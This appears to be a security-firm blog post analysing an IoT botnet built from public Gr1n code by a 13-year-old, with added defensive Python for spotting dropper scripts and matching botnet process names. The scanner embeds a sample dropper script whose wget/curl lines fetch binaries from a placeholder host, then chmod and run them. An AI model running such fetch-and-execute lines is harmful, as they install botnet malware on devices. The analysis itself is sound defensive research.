IoT Hackers Shift to the Dark Side
Introduction: The IoT threat landscape differs from conventional malware in terms of code sharing. While many Windows malware authors are reluctant to share their source code (for free), IoT botnet source modules are posted publicly on darknet hacking forums, which makes code reuse much easier. Most IoT malware threats have been aided heavily by code sharing and reuse.
There has been a trend of late to share hacking tutorials and code on forums under the tagline “This is only for educational purposes”. Many hackers use this technique because they believe it can save them from legal action in some cases. We observed one such dump site, Daddyhackingteam, which hosts a lot of malware source code and tutorials, has now shifted completely to the dark side: it is also a command and control server for an IoT botnet variant of Gr1n.
Who is Daddyhackingteam?
The Daddyhackingteam website contains an archive of several IoT botnet source codes available publicly. While the homepage asks for registration to access the archives, it was noted by security researcher @JaromirHorejsi that the archives can be accessed directly without authentication.


Image 1: Archive list
Upon registering with the site, we see a message of “site under development” and the contact details of the site owner (which helped us to track his activities).

Image 2: “Under Development”
Shift to the dark side
[Image courtesy of StarWars.com]

By tracking the listed Skype id, we observed that in the last few days this person made three posts on a hacking forum asking questions about setting up a QBot of his own and trying to get information on compromising CCTVs to build his own botnet. These posts range from 30th June 2017 to 21st August 2017.



Image 4: Forum posts
It seems that he has since built what he was looking for. On August 24th 2017, we observed in-the-wild samples where the same daddyhackingteam website known for hosting archives is used as a callback to download a shell script. This shell script in turn downloads and runs botnet binaries from the same website.
In the figure below we see connections made to botnet(dot)daddyhackingteam(dot)com to retrieve the script that downloads and runs the payload. As of this writing, these links were still live.

Image 5: Disassembly of retrieval code

Image 6: Script retrieved downloads and executes payload
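The retrieval stage described above is the classic IoT dropper pattern: a shell script fetches one binary per architecture, marks it executable and runs it. As an added example (not code from the article or from NewSky Security), the following Python scanner flags such download-chmod-execute chains in a script body. The sample script it parses is constructed for this example and uses a placeholder host (`bins.example.invalid`), not the real callback domain; it is the kind of check a defender can run on scripts recovered from a honeypot or a device's `/tmp` directory.

```python
import re
import shlex
from urllib.parse import urlparse

# Constructed sample dropper script for this example (placeholder host, not the real one).
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt
wget http://bins.example.invalid/arm7.bot -O arm7.bot; chmod +x arm7.bot; ./arm7.bot
curl -s -O http://bins.example.invalid/mips.bot; chmod 777 mips.bot; ./mips.bot
echo "done"
rm -rf arm7.bot mips.bot
"""

# Shell command separators: "&&" and "||" are listed before "&" and "|" so they win.
SPLIT_RE = re.compile(r"\s*(?:&&|\|\||;|\||&)\s*")


def _download_target(argv):
    """Return (url, local_filename) for a wget/curl command line, or None."""
    url = next((a for a in argv[1:] if a.startswith(("http://", "https://"))), None)
    if url is None:
        return None
    name = None
    for i, a in enumerate(argv):
        # wget -O <file> names the output; curl uses -o <file> (-O keeps the remote name)
        if argv[0] == "wget" and a in ("-O", "--output-document") and i + 1 < len(argv):
            name = argv[i + 1]
        if argv[0] == "curl" and a in ("-o", "--output") and i + 1 < len(argv):
            name = argv[i + 1]
    if name is None:
        name = urlparse(url).path.rsplit("/", 1)[-1]  # remote basename
    return url, name


def find_download_execute_chains(script_text):
    """Return one record per downloaded file that the script later executes."""
    downloaded = {}  # local filename -> URL it came from
    chmodded = set()  # downloaded files that were made executable
    chains = []
    for line in script_text.splitlines():
        for cmd in SPLIT_RE.split(line.strip()):
            if not cmd or cmd.startswith("#"):
                continue
            try:
                argv = shlex.split(cmd)
            except ValueError:  # unbalanced quotes; skip the fragment
                continue
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]
            if prog in ("wget", "curl"):
                target = _download_target(argv)
                if target:
                    downloaded[target[1]] = target[0]
            elif prog == "chmod":
                chmodded.update(a for a in argv[1:] if a in downloaded)
            else:
                # Direct execution (./file, /tmp/file) or via an interpreter (sh file)
                candidates = argv[1:] if prog in ("sh", "bash", "busybox") else [argv[0]]
                for c in candidates:
                    name = c.rsplit("/", 1)[-1]
                    if name in downloaded:
                        chains.append({"url": downloaded[name], "file": name,
                                       "chmod": name in chmodded})
    return chains


if __name__ == "__main__":
    for chain in find_download_execute_chains(SAMPLE_DROPPER):
        print(f"{chain['file']} fetched from {chain['url']} "
              f"(chmod before exec: {chain['chmod']})")
```

The scanner is intentionally conservative: it only reports a file once it sees the same name downloaded and then executed, so a script that merely fetches a file (or merely runs one) is not flagged, and the `chmod` field tells you whether the dropper bothered to set the execute bit before running it.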
Smaller but effective Botkiller
Like most popular IoT botnets, this sample also has a Botkiller module that stops competing IoT botnets that may be running on the victim's system. While the list contains 67 names and is considerably smaller than the latest Botkiller list of 215 observed in QBot (https://blog.newskysecurity.com/agile-122bf2f4e2f3 ), it uses wildcards instead of exact name matching. Hence the list can be equally (or even more) effective despite being small.

Image 7: Botkiller module
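The point that a short wildcard list can cover more than a long exact-name list applies just as much to a defender's own process-name detection rules, and so does its downside. As an added example (not the Botkiller code and not from the article), the following Python compares exact and wildcard matching with `fnmatch` over a constructed process list, and includes a check for patterns broad enough to hit benign processes. All process names and patterns here are made up for the example.

```python
import fnmatch

# Constructed process listing, as a defender might collect from ps or /proc.
BENIGN_PROCESSES = ["init", "sshd", "busybox", "httpd", "telnetd"]
SUSPECT_PROCESSES = ["demo_bot", "demo_bot.arm7", "demo_bot.mips", "x86.demo"]
SAMPLE_PROCESSES = BENIGN_PROCESSES + SUSPECT_PROCESSES

# Exact names only cover the variants you already know about...
EXACT_LIST = ["demo_bot"]
# ...while a couple of wildcard patterns cover every architecture build of the same family.
WILDCARD_LIST = ["demo_bot*", "*.demo"]


def match_names(process_names, patterns):
    """Return the set of process names matched by any pattern (case-sensitive glob)."""
    return {
        name
        for name in process_names
        if any(fnmatch.fnmatchcase(name, pat) for pat in patterns)
    }


def overbroad_patterns(patterns, benign_names):
    """Return patterns that would also match a known-benign process name."""
    return [pat for pat in patterns
            if any(fnmatch.fnmatchcase(name, pat) for name in benign_names)]


def coverage(process_names, patterns):
    """Fraction of the suspect processes a pattern list catches, 0.0 to 1.0."""
    hits = match_names(process_names, patterns) & set(SUSPECT_PROCESSES)
    return len(hits) / len(SUSPECT_PROCESSES)


if __name__ == "__main__":
    print("exact   :", sorted(match_names(SAMPLE_PROCESSES, EXACT_LIST)))
    print("wildcard:", sorted(match_names(SAMPLE_PROCESSES, WILDCARD_LIST)))
    # A lazy pattern like "*d" would kill sshd, httpd and telnetd too; flag it before deploying.
    print("overbroad:", overbroad_patterns(WILDCARD_LIST + ["*d"], BENIGN_PROCESSES))
```

`fnmatchcase` is used instead of `fnmatch` so the result does not depend on the host platform's case normalisation; on a Linux device process names are case-sensitive, and a rule that silently folds case will misbehave when tested on another OS.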
Gr1n botnet similarities
Upon investigation, we noticed that a lot of the code is inspired by (or maybe directly copied from) the Gr1n botnet, whose code is available publicly on GitHub and elsewhere. Below we see two images, one from the Gr1n botnet source code and the other from the decompiled malware binary. Both refer to the botnet command “VIEWPAGE”, which creates a temporary file, performs a wget of the website provided, and redirects the output to that file. The name of the junk temporary file, “yuagwduiagwdhg”, as well as the code flow is very similar in both images.

Image 8: Gr1n botnet source code from GitHub

Image 9: Code inspired by Gr1n botnet
The attack vector is also similar to Gr1n: a simple default-password guessing attack.
Malware author hunts for job
Interestingly, hacking forums were not the only place we saw the malware author's Skype username. We observed that he uses the same Skype id for both malicious purposes and job hunting, as shown below.

Image 10: Skype user name in other places
It is either bold or immature of a malware author to use the same contact information for job hunting as well as for malicious activities. However, in his job search attempt he mentions that he is 13 years old, which pretty much explains the dual use.
A conversation with the malware author
To get a closer perspective, we decided to go undercover and talk to the malware author himself via the Skype address he provided everywhere. When we discussed his botnet, he said he is at just 300 bots. Also, his CCTV botnet has not yet started, as nobody helped him on the hacking forums.


Image 11: Conversation with “script kiddie”
He confirmed to us again that he is 13. When we told him that such illegal activities can land him in trouble, he was confident that he was immune because he was young. While various laws do have less harsh sentences for juveniles, in this case we see this person deliberately taking advantage of that.
Conclusion
With tons of IoT botnet source code dumped publicly along with tutorials, it is literally child's play to set up a botnet by attacking IoT devices. While the steps to copy/paste and set up the IoT botnet may be simple, the consequences can be equally devastating when such botnet armies launch a denial-of-service attack. NewSky Security IoT Halo detects this botnet at both proactive and reactive levels.
Principal Researcher, NewSky Security (@newskysecurity)